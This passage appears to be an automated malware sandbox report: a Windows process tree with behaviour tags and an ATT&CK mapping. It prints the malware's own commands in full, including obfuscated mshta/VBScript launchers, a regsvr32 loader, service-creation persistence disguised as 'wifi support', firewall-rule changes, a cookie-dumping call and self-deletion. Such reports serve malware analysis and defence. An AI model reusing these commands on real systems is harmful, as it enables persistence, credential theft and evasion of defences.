                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-Q78CN.tmp\irecord.tmp" /SL5="$204F2,5808768,66560,C:\Program Files\Java\TCXGCYMDAE\irecord.exe" /VERYSILENT
                                                                                                                                                                            13⤵
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:4700
                                                                                                                                                                            • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                              "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                              14⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:6540
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\50-dac1d-67a-228b8-e56cdd3c9c3c7\Raetalylafi.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\50-dac1d-67a-228b8-e56cdd3c9c3c7\Raetalylafi.exe"
                                                                                                                                                                          12⤵
                                                                                                                                                                            PID:6348
                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                              dw20.exe -x -s 1996
                                                                                                                                                                              13⤵
                                                                                                                                                                                PID:4620
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a3-52aec-813-dd9bd-05fc0f84a0925\Vokaedynybae.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a3-52aec-813-dd9bd-05fc0f84a0925\Vokaedynybae.exe"
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:6000
                                                                                                                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                                                                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:2844
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-27SS1.tmp\MediaBurner.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-27SS1.tmp\MediaBurner.tmp" /SL5="$3043C,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                                              10⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:6204
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-PGBA2.tmp\JFHGSFGSIUGFSUIG.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-PGBA2.tmp\JFHGSFGSIUGFSUIG.exe" /S /UID=burnerch1
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                PID:6612
                                                                                                                                                                                • C:\Program Files\Google\WETXLWLATV\ultramediaburner.exe
                                                                                                                                                                                  "C:\Program Files\Google\WETXLWLATV\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:6692
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-8TLO4.tmp\ultramediaburner.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-8TLO4.tmp\ultramediaburner.tmp" /SL5="$104B0,281924,62464,C:\Program Files\Google\WETXLWLATV\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                      13⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      PID:4704
                                                                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                        14⤵
                                                                                                                                                                                          PID:5324
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\d6-22a68-04d-c60aa-a4f95eae53a40\Waelylaemuxu.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\d6-22a68-04d-c60aa-a4f95eae53a40\Waelylaemuxu.exe"
                                                                                                                                                                                      12⤵
                                                                                                                                                                                        PID:6064
                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                          dw20.exe -x -s 2236
                                                                                                                                                                                          13⤵
                                                                                                                                                                                            PID:4596
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4f-820d3-268-158b0-cb45fc2afef9d\Lulaedasaede.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4f-820d3-268-158b0-cb45fc2afef9d\Lulaedasaede.exe"
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:6548
                                                                                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:4640
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4491914.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4491914.exe"
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                          PID:7136
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5355750.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5355750.exe"
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:7160
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4823051.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4823051.exe"
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:7128
                                                                                                                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:2840
                                                                                                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:2056
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:6780
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eltcib20.5re\google-game.exe & exit
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:2844
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\eltcib20.5re\google-game.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\eltcib20.5re\google-game.exe
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:4704
                                                                                                                                                                                                • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                                                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",setpwd
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  PID:2576
                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5236
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        PID:3760
                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4392
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DE62.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\DE62.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4572
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DE62.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\DE62.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            PID:5220
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1228
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:5648
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 672
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:812
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E076.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E076.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5904
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\slgzxrfr\
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4728
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ktidpovf.exe" C:\Windows\SysWOW64\slgzxrfr\
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5588
                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create slgzxrfr binPath= "C:\Windows\SysWOW64\slgzxrfr\ktidpovf.exe /d\"C:\Users\Admin\AppData\Local\Temp\E076.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5440
                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description slgzxrfr "wifi internet conection"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5916
                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start slgzxrfr
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:5424
                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:6072
                                                                                                                                                                                                        • C:\Users\Admin\yhwrdcjt.exe
                                                                                                                                                                                                          "C:\Users\Admin\yhwrdcjt.exe" /d"C:\Users\Admin\AppData\Local\Temp\E076.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5296
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tzkvncwi.exe" C:\Windows\SysWOW64\slgzxrfr\
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5348
                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" config slgzxrfr binPath= "C:\Windows\SysWOW64\slgzxrfr\tzkvncwi.exe /d\"C:\Users\Admin\yhwrdcjt.exe\""
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5216
                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" start slgzxrfr
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5204
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5612
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E53A.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E53A.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                  PID:5696
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im E53A.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E53A.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:3868
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        taskkill /im E53A.exe /f
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:4664
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                        timeout /t 6
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:3200
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E77D.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E77D.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4916
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbsCriPt: cLose ( cReatEOBjecT ( "WsCRipT.SHeLl"). Run("CMd.EXe /C Type ""C:\Users\Admin\AppData\Local\Temp\E77D.exe"" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If """" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\E77D.exe"" ) do taskkill -Im ""%~NXD"" /F " ,0 , TrUE ) )
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4588
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\E77D.exe" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If "" == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\E77D.exe" ) do taskkill -Im "%~NXD" /F
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:1096
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE
                                                                                                                                                                                                                                ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:3424
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbsCriPt: cLose ( cReatEOBjecT ( "WsCRipT.SHeLl"). Run("CMd.EXe /C Type ""C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE"" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If ""-p0Bd6WU~zT21V9yySfmmv7 "" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE"" ) do taskkill -Im ""%~NXD"" /F " ,0 , TrUE ) )
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If "-p0Bd6WU~zT21V9yySfmmv7 " == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE" ) do taskkill -Im "%~NXD" /F
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:5448
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCrIPT: CLOSE( creAteOBJecT ( "WsCRIpT.ShElL"). RUn ( "C:\Windows\system32\cmd.exe /Q /c eCHo C:\Users\Admin\AppData\Local\TempcSpD> 10Ou8q.9 & ecHO | sET /p = ""MZ"" > 2AQ5.X& COpY /y /b 2Aq5.X + WwZoqDR.Aq_ + 3cQ7SE1.PD + 8jTXBDPR.VQ0 + BhxNJ8.m5W + 10OU8q.9 ..\fLNDPPCP.UUv & DEl /Q *& StArT regsvr32.exe ..\fLNDPPcp.UUv /s " , 0 , TRuE))
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:4892
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /Q /c eCHo C:\Users\Admin\AppData\Local\TempcSpD> 10Ou8q.9 & ecHO | sET /p = "MZ" >2AQ5.X& COpY /y /b 2Aq5.X + WwZoqDR.Aq_ + 3cQ7SE1.PD + 8jTXBDPR.VQ0 + BhxNJ8.m5W + 10OU8q.9 ..\fLNDPPCP.UUv & DEl /Q *& StArT regsvr32.exe ..\fLNDPPcp.UUv /s
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:2720
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:2700
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>2AQ5.X"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:5652
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                    regsvr32.exe ..\fLNDPPcp.UUv /s
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                                                                                    PID:4740
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              taskkill -Im "E77D.exe" /F
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:2980
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\EAE9.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\EAE9.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:3608
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\EAE9.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:5056
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                              PID:5536
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\slgzxrfr\tzkvncwi.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\slgzxrfr\tzkvncwi.exe /d"C:\Users\Admin\yhwrdcjt.exe"
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4700
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:5404
                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                            PID:5884
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:4436
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                            PID:4128
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 4128 -s 1224
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                              PID:5256
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 4128 -s 1476
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                              PID:5640
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                            PID:3564
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                            PID:5216
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 5216 -s 2032
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                              PID:7076
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                            PID:6564
                                                                                                                                                                                                                                          • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                            "LogonUI.exe" /flags:0x0 /state0:0xa3af0055 /state1:0x41c64e6d
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:7112
                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6556
                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:7036
                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:2180
                                                                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:1096
                                                                                                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4560
                                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                      PID:3188
                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 2996 -s 8304
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:5472

                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                    New Service

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1050

                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                    New Service

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1050

                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1222

                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                                    Query Registry

